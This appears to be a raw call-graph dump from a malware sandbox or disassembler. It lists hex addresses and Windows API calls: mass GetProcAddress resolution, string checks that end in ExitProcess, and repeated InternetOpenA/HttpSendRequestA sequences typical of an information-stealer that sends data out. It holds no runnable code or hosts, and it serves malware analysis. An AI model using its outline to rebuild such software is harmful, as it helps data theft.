14003->14004 14005 122f4c 14004->14005 14006 1245c0 2 API calls 14005->14006 14007 122f65 14006->14007 14008 1245c0 2 API calls 14007->14008 14009 122f7e 14008->14009 14010 1245c0 2 API calls 14009->14010 14011 122f97 14010->14011 14012 1245c0 2 API calls 14011->14012 14013 122fb0 14012->14013 14014 1245c0 2 API calls 14013->14014 14015 122fc9 14014->14015 14016 1245c0 2 API calls 14015->14016 14017 122fe2 14016->14017 14018 1245c0 2 API calls 14017->14018 14019 122ffb 14018->14019 14020 1245c0 2 API calls 14019->14020 14021 123014 14020->14021 14022 1245c0 2 API calls 14021->14022 14023 12302d 14022->14023 14024 1245c0 2 API calls 14023->14024 14025 123046 14024->14025 14026 1245c0 2 API calls 14025->14026 14027 12305f 14026->14027 14028 1245c0 2 API calls 14027->14028 14029 123078 14028->14029 14030 1245c0 2 API calls 14029->14030 14031 123091 14030->14031 14032 1245c0 2 API calls 14031->14032 14033 1230aa 14032->14033 14034 1245c0 2 API calls 14033->14034 14035 1230c3 14034->14035 14036 1245c0 2 API calls 14035->14036 14037 1230dc 14036->14037 14038 1245c0 2 API calls 14037->14038 14039 1230f5 14038->14039 14040 1245c0 2 API calls 14039->14040 14041 12310e 14040->14041 14042 1245c0 2 API calls 14041->14042 14043 123127 14042->14043 14044 1245c0 2 API calls 14043->14044 14045 123140 14044->14045 14046 1245c0 2 API calls 14045->14046 14047 123159 14046->14047 14048 1245c0 2 API calls 14047->14048 14049 123172 14048->14049 14050 1245c0 2 API calls 14049->14050 14051 12318b 14050->14051 14052 1245c0 2 API calls 14051->14052 14053 1231a4 14052->14053 14054 1245c0 2 API calls 14053->14054 14055 1231bd 14054->14055 14056 1245c0 2 API calls 14055->14056 14057 1231d6 14056->14057 14058 1245c0 2 API calls 14057->14058 14059 1231ef 14058->14059 14060 1245c0 2 API calls 14059->14060 14061 123208 14060->14061 14062 1245c0 2 API calls 14061->14062 14063 123221 14062->14063 14064 1245c0 2 API calls 14063->14064 14065 12323a 14064->14065 14066 1245c0 2 API calls 14065->14066 14067 123253 14066->14067 14068 1245c0 2 API calls 14067->14068 14069 12326c 14068->14069 14070 1245c0 2 API calls 14069->14070 14071 123285 14070->14071 14072 1245c0 2 API calls 14071->14072 14073 12329e 14072->14073 14074 1245c0 2 API calls 14073->14074 14075 1232b7 14074->14075 14076 1245c0 2 API calls 14075->14076 14077 1232d0 14076->14077 14078 1245c0 2 API calls 14077->14078 14079 1232e9 14078->14079 14080 1245c0 2 API calls 14079->14080 14081 123302 14080->14081 14082 1245c0 2 API calls 14081->14082 14083 12331b 14082->14083 14084 1245c0 2 API calls 14083->14084 14085 123334 14084->14085 14086 1245c0 2 API calls 14085->14086 14087 12334d 14086->14087 14088 1245c0 2 API calls 14087->14088 14089 123366 14088->14089 14090 1245c0 2 API calls 14089->14090 14091 12337f 14090->14091 14092 1245c0 2 API calls 14091->14092 14093 123398 14092->14093 14094 1245c0 2 API calls 14093->14094 14095 1233b1 14094->14095 14096 1245c0 2 API calls 14095->14096 14097 1233ca 14096->14097 14098 1245c0 2 API calls 14097->14098 14099 1233e3 14098->14099 14100 1245c0 2 API calls 14099->14100 14101 1233fc 14100->14101 14102 1245c0 2 API calls 14101->14102 14103 123415 14102->14103 14104 1245c0 2 API calls 14103->14104 14105 12342e 14104->14105 14106 1245c0 2 API calls 14105->14106 14107 123447 14106->14107 14108 1245c0 2 API calls 14107->14108 14109 123460 14108->14109 14110 1245c0 2 API calls 14109->14110 14111 123479 14110->14111 14112 1245c0 2 API calls 14111->14112 14113 123492 14112->14113 14114 1245c0 2 API calls 14113->14114 14115 1234ab 14114->14115 14116 1245c0 2 API calls 14115->14116 14117 1234c4 14116->14117 14118 1245c0 2 API calls 14117->14118 14119 1234dd 14118->14119 14120 1245c0 2 API calls 14119->14120 14121 1234f6 14120->14121 14122 1245c0 2 API calls 14121->14122 14123 12350f 14122->14123 14124 1245c0 2 API calls 14123->14124 14125 123528 14124->14125 14126 1245c0 2 API calls 14125->14126 14127 123541 14126->14127 14128 1245c0 2 API calls 14127->14128 14129 12355a 14128->14129 14130 1245c0 2 API calls 14129->14130 14131 123573 14130->14131 14132 1245c0 2 API calls 14131->14132 14133 12358c 14132->14133 14134 1245c0 2 API calls 14133->14134 14135 1235a5 14134->14135 14136 1245c0 2 API calls 14135->14136 14137 1235be 14136->14137 14138 1245c0 2 API calls 14137->14138 14139 1235d7 14138->14139 14140 1245c0 2 API calls 14139->14140 14141 1235f0 14140->14141 14142 1245c0 2 API calls 14141->14142 14143 123609 14142->14143 14144 1245c0 2 API calls 14143->14144 14145 123622 14144->14145 14146 1245c0 2 API calls 14145->14146 14147 12363b 14146->14147 14148 1245c0 2 API calls 14147->14148 14149 123654 14148->14149 14150 1245c0 2 API calls 14149->14150 14151 12366d 14150->14151 14152 1245c0 2 API calls 14151->14152 14153 123686 14152->14153 14154 1245c0 2 API calls 14153->14154 14155 12369f 14154->14155 14156 1245c0 2 API calls 14155->14156 14157 1236b8 14156->14157 14158 1245c0 2 API calls 14157->14158 14159 1236d1 14158->14159 14160 1245c0 2 API calls 14159->14160 14161 1236ea 14160->14161 14162 1245c0 2 API calls 14161->14162 14163 123703 14162->14163 14164 1245c0 2 API calls 14163->14164 14165 12371c 14164->14165 14166 1245c0 2 API calls 14165->14166 14167 123735 14166->14167 14168 1245c0 2 API calls 14167->14168 14169 12374e 14168->14169 14170 1245c0 2 API calls 14169->14170 14171 123767 14170->14171 14172 1245c0 2 API calls 14171->14172 14173 123780 14172->14173 14174 1245c0 2 API calls 14173->14174 14175 123799 14174->14175 14176 1245c0 2 API calls 14175->14176 14177 1237b2 14176->14177 14178 1245c0 2 API calls 14177->14178 14179 1237cb 14178->14179 14180 1245c0 2 API calls 14179->14180 14181 1237e4 14180->14181 14182 1245c0 2 API calls 14181->14182 14183 1237fd 14182->14183 14184 1245c0 2 API calls 14183->14184 14185 123816 14184->14185 14186 1245c0 2 API calls 14185->14186 14187 12382f 14186->14187 14188 1245c0 2 API calls 14187->14188 14189 123848 14188->14189 14190 1245c0 2 API calls 14189->14190 14191 123861 14190->14191 14192 1245c0 2 API calls 14191->14192 14193 12387a 14192->14193 14194 1245c0 2 API calls 14193->14194 14195 123893 14194->14195 14196 1245c0 2 API calls 14195->14196 14197 1238ac 14196->14197 14198 1245c0 2 API calls 14197->14198 14199 1238c5 14198->14199 14200 1245c0 2 API calls 14199->14200 14201 1238de 14200->14201 14202 1245c0 2 API calls 14201->14202 14203 1238f7 14202->14203 14204 1245c0 2 API calls 14203->14204 14205 123910 14204->14205 14206 1245c0 2 API calls 14205->14206 14207 123929 14206->14207 14208 1245c0 2 API calls 14207->14208 14209 123942 14208->14209 14210 1245c0 2 API calls 14209->14210 14211 12395b 14210->14211 14212 1245c0 2 API calls 14211->14212 14213 123974 14212->14213 14214 1245c0 2 API calls 14213->14214 14215 12398d 14214->14215 14216 1245c0 2 API calls 14215->14216 14217 1239a6 14216->14217 14218 1245c0 2 API calls 14217->14218 14219 1239bf 14218->14219 14220 1245c0 2 API calls 14219->14220 14221 1239d8 14220->14221 14222 1245c0 2 API calls 14221->14222 14223 1239f1 14222->14223 14224 1245c0 2 API calls 14223->14224 14225 123a0a 14224->14225 14226 1245c0 2 API calls 14225->14226 14227 123a23 14226->14227 14228 1245c0 2 API calls 14227->14228 14229 123a3c 14228->14229 14230 1245c0 2 API calls 14229->14230 14231 123a55 14230->14231 14232 1245c0 2 API calls 14231->14232 14233 123a6e 14232->14233 14234 1245c0 2 API calls 14233->14234 14235 123a87 14234->14235 14236 1245c0 2 API calls 14235->14236 14237 123aa0 14236->14237 14238 1245c0 2 API calls 14237->14238 14239 123ab9 14238->14239 14240 1245c0 2 API calls 14239->14240 14241 123ad2 14240->14241 14242 1245c0 2 API calls 14241->14242 14243 123aeb 14242->14243 14244 1245c0 2 API calls 14243->14244 14245 123b04 14244->14245 14246 1245c0 2 API calls 14245->14246 14247 123b1d 14246->14247 14248 1245c0 2 API calls 14247->14248 14249 123b36 14248->14249 14250 1245c0 2 API calls 14249->14250 14251 123b4f 14250->14251 14252 1245c0 2 API calls 14251->14252 14253 123b68 14252->14253 14254 1245c0 2 API calls 14253->14254 14255 123b81 14254->14255 14256 1245c0 2 API calls 14255->14256 14257 123b9a 14256->14257 14258 1245c0 2 API calls 14257->14258 14259 123bb3 14258->14259 14260 1245c0 2 API calls 14259->14260 14261 123bcc 14260->14261 14262 1245c0 2 API calls 14261->14262 14263 123be5 14262->14263 14264 1245c0 2 API calls 14263->14264 14265 123bfe 14264->14265 14266 1245c0 2 API calls 14265->14266 14267 123c17 14266->14267 14268 1245c0 2 API calls 14267->14268 14269 123c30 14268->14269 14270 1245c0 2 API calls 14269->14270 14271 123c49 14270->14271 14272 1245c0 2 API calls 14271->14272 14273 123c62 14272->14273 14274 1245c0 2 API calls 14273->14274 14275 123c7b 14274->14275 14276 1245c0 2 API calls 14275->14276 14277 123c94 14276->14277 14278 1245c0 2 API calls 14277->14278 14279 123cad 14278->14279 14280 1245c0 2 API calls 14279->14280 14281 123cc6 14280->14281 14282 1245c0 2 API calls 14281->14282 14283 123cdf 14282->14283 14284 1245c0 2 API calls 14283->14284 14285 123cf8 14284->14285 14286 1245c0 2 API calls 14285->14286 14287 123d11 14286->14287 14288 1245c0 2 API calls 14287->14288 14289 123d2a 14288->14289 14290 1245c0 2 API calls 14289->14290 14291 123d43 14290->14291 14292 1245c0 2 API calls 14291->14292 14293 123d5c 14292->14293 14294 1245c0 2 API calls 14293->14294 14295 123d75 14294->14295 14296 1245c0 2 API calls 14295->14296 14297 123d8e 14296->14297 14298 1245c0 2 API calls 14297->14298 14299 123da7 14298->14299 14300 1245c0 2 API calls 14299->14300 14301 123dc0 14300->14301 14302 1245c0 2 API calls 14301->14302 14303 123dd9 14302->14303 14304 1245c0 2 API calls 14303->14304 14305 123df2 14304->14305 14306 1245c0 2 API calls 14305->14306 14307 123e0b 14306->14307 14308 1245c0 2 API calls 14307->14308 14309 123e24 14308->14309 14310 1245c0 2 API calls 14309->14310 14311 123e3d 14310->14311 14312 1245c0 2 API calls 14311->14312 14313 123e56 14312->14313 14314 1245c0 2 API calls 14313->14314 14315 123e6f 14314->14315 14316 1245c0 2 API calls 14315->14316 14317 123e88 14316->14317 14318 1245c0 2 API calls 14317->14318 14319 123ea1 14318->14319 14320 1245c0 2 API calls 14319->14320 14321 123eba 14320->14321 14322 1245c0 2 API calls 14321->14322 14323 123ed3 14322->14323 14324 1245c0 2 API calls 14323->14324 14325 123eec 14324->14325 14326 1245c0 2 API calls 14325->14326 14327 123f05 14326->14327 14328 1245c0 2 API calls 14327->14328 14329 123f1e 14328->14329 14330 1245c0 2 API calls 14329->14330 14331 123f37 14330->14331 14332 1245c0 2 API calls 14331->14332 14333 123f50 14332->14333 14334 1245c0 2 API calls 14333->14334 14335 123f69 14334->14335 14336 1245c0 2 API calls 14335->14336 14337 123f82 14336->14337 14338 1245c0 2 API calls 14337->14338 14339 123f9b 14338->14339 14340 1245c0 2 API calls 14339->14340 14341 123fb4 14340->14341 14342 1245c0 2 API calls 14341->14342 14343 123fcd 14342->14343 14344 1245c0 2 API calls 14343->14344 14345 123fe6 14344->14345 14346 1245c0 2 API calls 14345->14346 14347 123fff 14346->14347 14348 1245c0 2 API calls 14347->14348 14349 124018 14348->14349 14350 1245c0 2 API calls 14349->14350 14351 124031 14350->14351 14352 1245c0 2 API calls 14351->14352 14353 12404a 14352->14353 14354 1245c0 2 API calls 14353->14354 14355 124063 14354->14355 14356 1245c0 2 API calls 14355->14356 14357 12407c 14356->14357 14358 1245c0 2 API calls 14357->14358 14359 124095 14358->14359 14360 1245c0 2 API calls 14359->14360 14361 1240ae 14360->14361 14362 1245c0 2 API calls 14361->14362 14363 1240c7 14362->14363 14364 1245c0 2 API calls 14363->14364 14365 1240e0 14364->14365 14366 1245c0 2 API calls 14365->14366 14367 1240f9 14366->14367 14368 1245c0 2 API calls 14367->14368 14369 124112 14368->14369 14370 1245c0 2 API calls 14369->14370 14371 12412b 14370->14371 14372 1245c0 2 API calls 14371->14372 14373 124144 14372->14373 14374 1245c0 2 API calls 14373->14374 14375 12415d 14374->14375 14376 1245c0 2 API calls 14375->14376 14377 124176 14376->14377 14378 1245c0 2 API calls 14377->14378 14379 12418f 14378->14379 14380 1245c0 2 API calls 14379->14380 14381 1241a8 14380->14381 14382 1245c0 2 API calls 14381->14382 14383 1241c1 14382->14383 14384 1245c0 2 API calls 14383->14384 14385 1241da 14384->14385 14386 1245c0 2 API calls 14385->14386 14387 1241f3 14386->14387 14388 1245c0 2 API calls 14387->14388 14389 12420c 14388->14389 14390 1245c0 2 API calls 14389->14390 14391 124225 14390->14391 14392 1245c0 2 API calls 14391->14392 14393 12423e 14392->14393 14394 1245c0 2 API calls 14393->14394 14395 124257 14394->14395 14396 1245c0 2 API calls 14395->14396 14397 124270 14396->14397 14398 1245c0 2 API calls 14397->14398 14399 124289 14398->14399 14400 1245c0 2 API calls 14399->14400 14401 1242a2 14400->14401 14402 1245c0 2 API calls 14401->14402 14403 1242bb 14402->14403 14404 1245c0 2 API calls 14403->14404 14405 1242d4 14404->14405 14406 1245c0 2 API calls 14405->14406 14407 1242ed 14406->14407 14408 1245c0 2 API calls 14407->14408 14409 124306 14408->14409 14410 1245c0 2 API calls 14409->14410 14411 12431f 14410->14411 14412 1245c0 2 API calls 14411->14412 14413 124338 14412->14413 14414 1245c0 2 API calls 14413->14414 14415 124351 14414->14415 14416 1245c0 2 API calls 14415->14416 14417 12436a 14416->14417 14418 1245c0 2 API calls 14417->14418 14419 124383 14418->14419 14420 1245c0 2 API calls 14419->14420 14421 12439c 14420->14421 14422 1245c0 2 API calls 14421->14422 14423 1243b5 14422->14423 14424 1245c0 2 API calls 14423->14424 14425 1243ce 14424->14425 14426 1245c0 2 API calls 14425->14426 14427 1243e7 14426->14427 14428 1245c0 2 API calls 14427->14428 14429 124400 14428->14429 14430 1245c0 2 API calls 14429->14430 14431 124419 14430->14431 14432 1245c0 2 API calls 14431->14432 14433 124432 14432->14433 14434 1245c0 2 API calls 14433->14434 14435 12444b 14434->14435 14436 1245c0 2 API calls 14435->14436 14437 124464 14436->14437 14438 1245c0 2 API calls 14437->14438 14439 12447d 14438->14439 14440 1245c0 2 API calls 14439->14440 14441 124496 14440->14441 14442 1245c0 2 API calls 14441->14442 14443 1244af 14442->14443 14444 1245c0 2 API calls 14443->14444 14445 1244c8 14444->14445 14446 1245c0 2 API calls 14445->14446 14447 1244e1 14446->14447 14448 1245c0 2 API calls 14447->14448 14449 1244fa 14448->14449 14450 1245c0 2 API calls 14449->14450 14451 124513 14450->14451 14452 1245c0 2 API calls 14451->14452 14453 12452c 14452->14453 14454 1245c0 2 API calls 14453->14454 14455 124545 14454->14455 14456 1245c0 2 API calls 14455->14456 14457 12455e 14456->14457 14458 1245c0 2 API calls 14457->14458 14459 124577 14458->14459 14460 1245c0 2 API calls 14459->14460 14461 124590 14460->14461 14462 1245c0 2 API calls 14461->14462 14463 1245a9 14462->14463 14464 139c10 14463->14464 14465 139c20 43 API calls 14464->14465 14466 13a036 8 API calls 14464->14466 14465->14466 14467 13a146 14466->14467 14468 13a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14466->14468 14469 13a153 8 API calls 14467->14469 14470 13a216 14467->14470 14468->14467 14469->14470 14471 13a298 14470->14471 14472 13a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14470->14472 14473 13a337 14471->14473 14474 13a2a5 6 API calls 14471->14474 14472->14471 14475 13a344 9 API calls 14473->14475 14476 13a41f 14473->14476 14474->14473 14475->14476 14477 13a4a2 14476->14477 14478 13a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14476->14478 14479 13a4ab GetProcAddress GetProcAddress 14477->14479 14480 13a4dc 14477->14480 14478->14477 14479->14480 14481 13a515 14480->14481 14482 13a4e5 GetProcAddress GetProcAddress 14480->14482 14483 13a612 14481->14483 14484 13a522 10 API calls 14481->14484 14482->14481 14485 13a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14483->14485 14486 13a67d 14483->14486 14484->14483 14485->14486 14487 13a686 GetProcAddress 14486->14487 14488 13a69e 14486->14488 14487->14488 14489 13a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14488->14489 14490 135ca3 14488->14490 14489->14490 14491 121590 14490->14491 15612 121670 14491->15612 14494 13a7a0 lstrcpy 14495 1215b5 14494->14495 14496 13a7a0 lstrcpy 14495->14496 14497 1215c7 14496->14497 14498 13a7a0 lstrcpy 14497->14498 14499 1215d9 14498->14499 14500 13a7a0 lstrcpy 14499->14500 14501 121663 14500->14501 14502 135510 14501->14502 14503 135521 14502->14503 14504 13a820 2 API calls 14503->14504 14505 13552e 14504->14505 14506 13a820 2 API calls 14505->14506 14507 13553b 14506->14507 14508 13a820 2 API calls 14507->14508 14509 135548 14508->14509 14510 13a740 lstrcpy 14509->14510 14511 135555 14510->14511 14512 13a740 lstrcpy 14511->14512 14513 135562 14512->14513 14514 13a740 lstrcpy 14513->14514 14515 13556f 14514->14515 14516 13a740 lstrcpy 14515->14516 14556 13557c 14516->14556 14517 1351f0 20 API calls 14517->14556 14518 135643 StrCmpCA 14518->14556 14519 1356a0 StrCmpCA 14520 1357dc 14519->14520 14519->14556 14521 13a8a0 lstrcpy 14520->14521 14522 1357e8 14521->14522 14523 13a820 2 API calls 14522->14523 14526 1357f6 14523->14526 14524 13a740 lstrcpy 14524->14556 14525 13a820 lstrlen lstrcpy 14525->14556 14528 13a820 2 API calls 14526->14528 14527 135856 StrCmpCA 14529 135991 14527->14529 14527->14556 14532 135805 14528->14532 14531 13a8a0 lstrcpy 14529->14531 14530 13a8a0 lstrcpy 14530->14556 14533 13599d 14531->14533 14534 121670 lstrcpy 14532->14534 14535 13a820 2 API calls 14533->14535 14553 135811 14534->14553 14536 1359ab 14535->14536 14538 13a820 2 API calls 14536->14538 14537 135a0b StrCmpCA 14539 135a16 Sleep 14537->14539 14540 135a28 14537->14540 14541 1359ba 14538->14541 14539->14556 14542 13a8a0 lstrcpy 14540->14542 14543 121670 lstrcpy 14541->14543 14544 135a34 14542->14544 14543->14553 14546 13a820 2 API calls 14544->14546 14545 121590 lstrcpy 14545->14556 14547 135a43 14546->14547 14549 13a820 2 API calls 14547->14549 14548 1352c0 25 API calls 14548->14556 14550 135a52 14549->14550 14552 121670 lstrcpy 14550->14552 14551 13578a StrCmpCA 14551->14556 14552->14553 14553->13609 14554 13593f StrCmpCA 14554->14556 14555 13a7a0 lstrcpy 14555->14556 14556->14517 14556->14518 14556->14519 14556->14524 14556->14525 14556->14527 14556->14530 14556->14537 14556->14545 14556->14548 14556->14551 14556->14554 14556->14555 14558 137553 GetVolumeInformationA 14557->14558 14559 13754c 14557->14559 14560 137591 14558->14560 14559->14558 14561 1375fc GetProcessHeap RtlAllocateHeap 14560->14561 14562 137619 14561->14562 14563 137628 wsprintfA 14561->14563 14564 13a740 lstrcpy 14562->14564 14565 13a740 lstrcpy 14563->14565 14566 135da7 14564->14566 14565->14566 14566->13630 14568 13a7a0 lstrcpy 14567->14568 14569 124899 14568->14569 15621 1247b0 14569->15621 14571 1248a5 14572 13a740 lstrcpy 14571->14572 14573 1248d7 14572->14573 14574 13a740 lstrcpy 14573->14574 14575 1248e4 14574->14575 14576 13a740 lstrcpy 14575->14576 14577 1248f1 14576->14577 14578 13a740 lstrcpy 14577->14578 14579 1248fe 14578->14579 14580 13a740 lstrcpy 14579->14580 14581 12490b InternetOpenA StrCmpCA 14580->14581 14582 124944 14581->14582 14583 124ecb InternetCloseHandle 14582->14583 15627 138b60 14582->15627 14585 124ee8 14583->14585 15642 129ac0 CryptStringToBinaryA 14585->15642 14586 124963 15635 13a920 14586->15635 14589 124976 14591 13a8a0 lstrcpy 14589->14591 14596 12497f 14591->14596 14592 13a820 2 API calls 14593 124f05 14592->14593 14594 13a9b0 4 API calls 14593->14594 14597 124f1b 14594->14597 14595 124f27 ctype 14599 13a7a0 lstrcpy 14595->14599 14600 13a9b0 4 API calls 14596->14600 14598 13a8a0 lstrcpy 14597->14598 14598->14595 14612 124f57 14599->14612 14601 1249a9 14600->14601 14602 13a8a0 lstrcpy 14601->14602 14603 1249b2 14602->14603 14604 13a9b0 4 API calls 14603->14604 14605 1249d1 14604->14605 14606 13a8a0 lstrcpy 14605->14606 14607 1249da 14606->14607 14608 13a920 3 API calls 14607->14608 14609 1249f8 14608->14609 14610 13a8a0 lstrcpy 14609->14610 14611 124a01 14610->14611 14613 13a9b0 4 API calls 14611->14613 14612->13633 14614 124a20 14613->14614 14615 13a8a0 lstrcpy 14614->14615 14616 124a29 14615->14616 14617 13a9b0 4 API calls 14616->14617 14618 124a48 14617->14618 14619 13a8a0 lstrcpy 14618->14619 14620 124a51 14619->14620 14621 13a9b0 4 API calls 14620->14621 14622 124a7d 14621->14622 14623 13a920 3 API calls 14622->14623 14624 124a84 14623->14624 14625 13a8a0 lstrcpy 14624->14625 14626 124a8d 14625->14626 14627 124aa3 InternetConnectA 14626->14627 14627->14583 14628 124ad3 HttpOpenRequestA 14627->14628 14630 124b28 14628->14630 14631 124ebe InternetCloseHandle 14628->14631 14632 13a9b0 4 API calls 14630->14632 14631->14583 14633 124b3c 14632->14633 14634 13a8a0 lstrcpy 14633->14634 14635 124b45 14634->14635 14636 13a920 3 API calls 14635->14636 14637 124b63 14636->14637 14638 13a8a0 lstrcpy 14637->14638 14639 124b6c 14638->14639 14640 13a9b0 4 API calls 14639->14640 14641 124b8b 14640->14641 14642 13a8a0 lstrcpy 14641->14642 14643 124b94 14642->14643 14644 13a9b0 4 API calls 14643->14644 14645 124bb5 14644->14645 14646 13a8a0 lstrcpy 14645->14646 14647 124bbe 14646->14647 14648 13a9b0 4 API calls 14647->14648 14649 124bde 14648->14649 14650 13a8a0 lstrcpy 14649->14650 14651 124be7 14650->14651 14652 13a9b0 4 API calls 14651->14652 14653 124c06 14652->14653 14654 13a8a0 lstrcpy 14653->14654 14655 124c0f 14654->14655 14656 13a920 3 API calls 14655->14656 14657 124c2d 14656->14657 14658 13a8a0 lstrcpy 14657->14658 14659 124c36 14658->14659 14660 13a9b0 4 API calls 14659->14660 14661 124c55 14660->14661 14662 13a8a0 lstrcpy 14661->14662 14663 124c5e 14662->14663 14664 13a9b0 4 API calls 14663->14664 14665 124c7d 14664->14665 14666 13a8a0 lstrcpy 14665->14666 14667 124c86 14666->14667 14668 13a920 3 API calls 14667->14668 14669 124ca4 14668->14669 14670 13a8a0 lstrcpy 14669->14670 14671 124cad 14670->14671 14672 13a9b0 4 API calls 14671->14672 14673 124ccc 14672->14673 14674 13a8a0 lstrcpy 14673->14674 14675 124cd5 14674->14675 14676 13a9b0 4 API calls 14675->14676 14677 124cf6 14676->14677 14678 13a8a0 lstrcpy 14677->14678 14679 124cff 14678->14679 14680 13a9b0 4 API calls 14679->14680 14681 124d1f 14680->14681 14682 13a8a0 lstrcpy 14681->14682 14683 124d28 14682->14683 14684 13a9b0 4 API calls 14683->14684 14685 124d47 14684->14685 14686 13a8a0 lstrcpy 14685->14686 14687 124d50 14686->14687 14688 13a920 3 API calls 14687->14688 14689 124d6e 14688->14689 14690 13a8a0 lstrcpy 14689->14690 14691 124d77 14690->14691 14692 13a740 lstrcpy 14691->14692 14693 124d92 14692->14693 14694 13a920 3 API calls 14693->14694 14695 124db3 14694->14695 14696 13a920 3 API calls 14695->14696 14697 124dba 14696->14697 14698 13a8a0 lstrcpy 14697->14698 14699 124dc6 14698->14699 14700 124de7 lstrlen 14699->14700 14701 124dfa 14700->14701 14702 124e03 lstrlen 14701->14702 15641 13aad0 14702->15641 14704 124e13 HttpSendRequestA 14705 124e32 InternetReadFile 14704->14705 14706 124e67 InternetCloseHandle 14705->14706 14711 124e5e 14705->14711 14709 13a800 14706->14709 14708 13a9b0 4 API calls 14708->14711 14709->14631 14710 13a8a0 lstrcpy 14710->14711 14711->14705 14711->14706 14711->14708 14711->14710 15648 13aad0 14712->15648 14714 1317c4 StrCmpCA 14715 1317d7 14714->14715 14716 1317cf ExitProcess 14714->14716 14717 131913 StrCmpCA 14715->14717 14718 131932 StrCmpCA 14715->14718 14719 1318f1 StrCmpCA 14715->14719 14720 131951 StrCmpCA 14715->14720 14721 131970 StrCmpCA 14715->14721 14722 13187f StrCmpCA 14715->14722 14723 13185d StrCmpCA 14715->14723 14724 1318cf StrCmpCA 14715->14724 14725 1318ad StrCmpCA 14715->14725 14726 1319c2 14715->14726 14727 13a820 lstrlen lstrcpy 14715->14727 14717->14715 14718->14715 14719->14715 14720->14715 14721->14715 14722->14715 14723->14715 14724->14715 14725->14715 14726->13635 14727->14715 14729 13a7a0 lstrcpy 14728->14729 14730 125979 14729->14730 14731 1247b0 2 API calls 14730->14731 14732 125985 14731->14732 14733 13a740 lstrcpy 14732->14733 14734 1259ba 14733->14734 14735 13a740 lstrcpy 14734->14735 14736 1259c7 14735->14736 14737 13a740 lstrcpy 14736->14737 14738 1259d4 14737->14738 14739 13a740 lstrcpy 14738->14739 14740 1259e1 14739->14740 14741 13a740 lstrcpy 14740->14741 14742 1259ee InternetOpenA StrCmpCA 14741->14742 14743 125a1d 14742->14743 14744 125fc3 InternetCloseHandle 14743->14744 14745 138b60 3 API calls 14743->14745 14746 125fe0 14744->14746 14747 125a3c 14745->14747 14749 129ac0 4 API calls 14746->14749 14748 13a920 3 API calls 14747->14748 14750 125a4f 14748->14750 14751 125fe6 14749->14751 14752 13a8a0 lstrcpy 14750->14752 14753 13a820 2 API calls 14751->14753 14755 12601f ctype 14751->14755 14757 125a58 14752->14757 14754 125ffd 14753->14754 14756 13a9b0 4 API calls 14754->14756 14759 13a7a0 lstrcpy 14755->14759 14758 126013 14756->14758 14761 13a9b0 4 API calls 14757->14761 14760 13a8a0 lstrcpy 14758->14760 14769 12604f 14759->14769 14760->14755 14762 125a82 14761->14762 14763 13a8a0 lstrcpy 14762->14763 14764 125a8b 14763->14764 14765 13a9b0 4 API calls 14764->14765 14766 125aaa 14765->14766 14767 13a8a0 lstrcpy 14766->14767 14768 125ab3 14767->14768 14770 13a920 3 API calls 14768->14770 14769->13641 14771 125ad1 14770->14771 14772 13a8a0 lstrcpy 14771->14772 14773 125ada 14772->14773 14774 13a9b0 4 API calls 14773->14774 14775 125af9 14774->14775 14776 13a8a0 lstrcpy 14775->14776 14777 125b02 14776->14777 14778 13a9b0 4 API calls 14777->14778 14779 125b21 14778->14779 14780 13a8a0 lstrcpy 14779->14780 14781 125b2a 14780->14781 14782 13a9b0 4 API calls 14781->14782 14783 125b56 14782->14783 14784 13a920 3 API calls 14783->14784 14785 125b5d 14784->14785 14786 13a8a0 lstrcpy 14785->14786 14787 125b66 14786->14787 14788 125b7c InternetConnectA 14787->14788 14788->14744 14789 125bac HttpOpenRequestA 14788->14789 14791 125fb6 InternetCloseHandle 14789->14791 14792 125c0b 14789->14792 14791->14744 14793 13a9b0 4 API calls 14792->14793 14794 125c1f 14793->14794 14795 13a8a0 lstrcpy 14794->14795 14796 125c28 14795->14796 14797 13a920 3 API calls 14796->14797 14798 125c46 14797->14798 14799 13a8a0 lstrcpy 14798->14799 14800 125c4f 14799->14800 14801 13a9b0 4 API calls 14800->14801 14802 125c6e 14801->14802 14803 13a8a0 lstrcpy 14802->14803 14804 125c77 14803->14804 14805 13a9b0 4 API calls 14804->14805 14806 125c98 14805->14806 14807 13a8a0 lstrcpy 14806->14807 14808 125ca1 14807->14808 14809 13a9b0 4 API calls 14808->14809 14810 125cc1 14809->14810 14811 13a8a0 lstrcpy 14810->14811 14812 125cca 14811->14812 14813 13a9b0 4 API calls 14812->14813 14814 125ce9 14813->14814 14815 13a8a0 lstrcpy 14814->14815 14816 125cf2 14815->14816 14817 13a920 3 API calls 14816->14817 14818 125d10 14817->14818 14819 13a8a0 lstrcpy 14818->14819 14820 125d19 14819->14820 14821 13a9b0 4 API calls 14820->14821 14822 125d38 14821->14822 14823 13a8a0 lstrcpy 14822->14823 14824 125d41 14823->14824 14825 13a9b0 4 API calls 14824->14825 14826 125d60 14825->14826 14827 13a8a0 lstrcpy 14826->14827 14828 125d69 14827->14828 14829 13a920 3 API calls 14828->14829 14830 125d87 14829->14830 14831 13a8a0 lstrcpy 14830->14831 14832 125d90 14831->14832 14833 13a9b0 4 API calls 14832->14833 14834 125daf 14833->14834 14835 13a8a0 lstrcpy 14834->14835 14836 125db8 14835->14836 14837 13a9b0 4 API calls 14836->14837 14838 125dd9 14837->14838 14839 13a8a0 lstrcpy 14838->14839 14840 125de2 14839->14840 14841 13a9b0 4 API calls 14840->14841 14842 125e02 14841->14842 14843 13a8a0 lstrcpy 14842->14843 14844 125e0b 14843->14844 14845 13a9b0 4 API calls 14844->14845 14846 125e2a 14845->14846 14847 13a8a0 lstrcpy 14846->14847 14848 125e33 14847->14848 14849 13a920 3 API calls 14848->14849 14850 125e54 14849->14850 14851 13a8a0 lstrcpy 14850->14851 14852 125e5d 14851->14852 14853 125e70 lstrlen 14852->14853 15649 13aad0 14853->15649 14855 125e81 lstrlen GetProcessHeap RtlAllocateHeap 15650 13aad0 14855->15650 14857 125eae lstrlen 14858 125ebe 14857->14858 14859 125ed7 lstrlen 14858->14859 14860 125ee7 14859->14860 14861 125ef0 lstrlen 14860->14861 14862 125f04 14861->14862 14863 125f1a lstrlen 14862->14863 15651 13aad0 14863->15651 14865 125f2a HttpSendRequestA 14866 125f35 InternetReadFile 14865->14866 14867 125f6a InternetCloseHandle 14866->14867 14871 125f61 14866->14871 14867->14791 14869 13a9b0 4 API calls 14869->14871 14870 13a8a0 lstrcpy 14870->14871 